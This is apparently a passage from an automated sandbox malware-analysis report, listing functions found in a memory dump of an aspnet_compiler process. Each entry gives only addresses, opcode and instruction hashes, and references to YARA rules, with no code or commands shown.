                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dfb0eb59606a4247da886ee415a0cf1ca869ab3afb171f55bc682b9253319fbe
                                                                • Instruction ID: d197f8ad449b435eb3c2b94fcc4c750c7b6b386b8beb20367f31477091ce7c24
                                                                • Opcode Fuzzy Hash: dfb0eb59606a4247da886ee415a0cf1ca869ab3afb171f55bc682b9253319fbe
                                                                • Instruction Fuzzy Hash: D5014BB090A65D9FDB92DB6484587D9BBF0FF6A315F2480EAC088DB161D7784EC5CB10
                                                                Function 00007FFD9B965971 Relevance: .0, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 167f3e57fa72d141e0780a616942df443250d0b72f27f543f7eac9980a4cb3fd
                                                                • Instruction ID: 89b24dc3ae6717a0949a27dd500d360230d90b15c7acba26a0cd0bce299c44cc
                                                                • Opcode Fuzzy Hash: 167f3e57fa72d141e0780a616942df443250d0b72f27f543f7eac9980a4cb3fd
                                                                • Instruction Fuzzy Hash: 0AF0E230C5A64D9FD7119BA088182F97BB0EF1A210F4204A3E40CCA0B2EA385614C702
                                                                Function 00007FFD9B96ABA1 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 154752947b8d85f2ae7aafc5791441bc3d76141d3af6b7c627024466dc4e5bd5
                                                                • Instruction ID: 8bd228e4dfee66304528d5b9d45ff677c9933c60bf687f8871e3003d941adb7f
                                                                • Opcode Fuzzy Hash: 154752947b8d85f2ae7aafc5791441bc3d76141d3af6b7c627024466dc4e5bd5
                                                                • Instruction Fuzzy Hash: B5011A70D1561E9FEBA9DF48C854BDDB7B1FF44304F1001A9D419932A0DB386A85CB40
                                                                Function 00007FFD9B96ABAB Relevance: .0, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cdb2f69b492a63de2203fbe2c21c0ccafe137aed001d317ba4605f6ea5688b55
                                                                • Instruction ID: 9d036ee92cfc9a8aba6f5e99df3e2ababa42c8e5575ab5fe4deb17689b6d149a
                                                                • Opcode Fuzzy Hash: cdb2f69b492a63de2203fbe2c21c0ccafe137aed001d317ba4605f6ea5688b55
                                                                • Instruction Fuzzy Hash: B8F0EC70D2960E9FEBA9DF58C855BE977B1EF04304F110268D419932A0DA386A56DB40
                                                                Function 00007FFD9B960C0B Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ebe5394a63e06337ae09ad7e65c9c646072fe6e2cf55ed0a5b8e56652be79e5
                                                                • Instruction ID: 085e386fc4162473628a5491899f52a1c4ee71309bd93bcf750abdab8e8e8989
                                                                • Opcode Fuzzy Hash: 6ebe5394a63e06337ae09ad7e65c9c646072fe6e2cf55ed0a5b8e56652be79e5
                                                                • Instruction Fuzzy Hash: 8BF0F87091965D9FDB96EB688859AD9BBB0FF29301F1040EAC089D7261EA745EC18F40
                                                                Function 00007FFD9B960E18 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f7c06d741d6cd42403fe8ad40c898cce202714669c7f7754537df092a1f72b1a
                                                                • Instruction ID: afcbdd4818e43a8b3dc74bef3b0d3b44f6dc4ceb7b6243bf58f62e3d2987a473
                                                                • Opcode Fuzzy Hash: f7c06d741d6cd42403fe8ad40c898cce202714669c7f7754537df092a1f72b1a
                                                                • Instruction Fuzzy Hash: 05F05E70A1A65C9FEB92EF28C858AD9BBB0FF2A301F1000D9C049C7165DB345D81CF00
                                                                Function 00007FFD9B960BA2 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c6e4f56e5eb99a5daf0d1b05b167c7c62684a8ffb739f8e8e731f3b47e88fb4
                                                                • Instruction ID: 89856dc9975135c070e3c22ea95f758138f56b5867dab12dd7cc060c79466181
                                                                • Opcode Fuzzy Hash: 1c6e4f56e5eb99a5daf0d1b05b167c7c62684a8ffb739f8e8e731f3b47e88fb4
                                                                • Instruction Fuzzy Hash: F2F05E7085464E8FEBA1EB28C858B99BBB0FF25300F0480EAC00ED7161EA345EC1CF00
                                                                Function 00007FFD9B960F12 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f2a1743f7f71c52902a63fa7843e69891fbe54a8bcc72dc8ea17325429eac5f3
                                                                • Instruction ID: ce2fd0b6458cee6390bbafc50893fa7a769f70f5c04a37adce511a746f517f5e
                                                                • Opcode Fuzzy Hash: f2a1743f7f71c52902a63fa7843e69891fbe54a8bcc72dc8ea17325429eac5f3
                                                                • Instruction Fuzzy Hash: 32F0A7B094A64A5FC78BDB34885959D7FA1AF17210B4140F9C444CF1A2DA250D498721
                                                                Function 00007FFD9B960B38 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 43b37e87b0702f18cd0f9f377909e954961bdf08b0a4952a4f8dbb1f5820231a
                                                                • Instruction ID: b8171f377d2faa425304117f451240964eac489ba30bc66423e34b7057180bcf
                                                                • Opcode Fuzzy Hash: 43b37e87b0702f18cd0f9f377909e954961bdf08b0a4952a4f8dbb1f5820231a
                                                                • Instruction Fuzzy Hash: C7F0D47091A65C9FEB91EB688858B99BBB0FF69200F1041EAC04DE7261EA345E85CF10
                                                                Function 00007FFD9B960C74 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b8a343db9d9284a692b1ae496efb5454a5cfc47d3a897dc9d7256b53ca858361
                                                                • Instruction ID: cf5353539d27f327a01709bc33760b0c3201065837f213f4d7d7653878114fa7
                                                                • Opcode Fuzzy Hash: b8a343db9d9284a692b1ae496efb5454a5cfc47d3a897dc9d7256b53ca858361
                                                                • Instruction Fuzzy Hash: 58F0FE7096565D9FDB92EB288898A997BF0FF29311F1040EAC049D7161DA345E81CB00
                                                                Function 00007FFD9B960ADD Relevance: .0, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4e92db494be4c3b9670ad57dde29b8622811c50a70b20b433547daec96b98feb
                                                                • Instruction ID: 862f857c9474d1f59f7427a3b8d8fcb25179a7ad910a1b4c2398c2916a4c5338
                                                                • Opcode Fuzzy Hash: 4e92db494be4c3b9670ad57dde29b8622811c50a70b20b433547daec96b98feb
                                                                • Instruction Fuzzy Hash: 2BF0C07091975C9FDB91EB688499B597BF1FF26200F1440E9D04DD7161DB345D85CB01
                                                                Function 00007FFD9B9651FA Relevance: .0, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11ad38c12136099a510316bb5900612a154bb20845b4241359b0c5bf23b03a82
                                                                • Instruction ID: a5d5e0283d4a0e9a905ea0a07315bd7d9cc9039ebb0d7d673427921b397aa586
                                                                • Opcode Fuzzy Hash: 11ad38c12136099a510316bb5900612a154bb20845b4241359b0c5bf23b03a82
                                                                • Instruction Fuzzy Hash: 4AA0025F74813164621971DEBA158DC8709DAC23FB6144173E36ED50976984504B26A5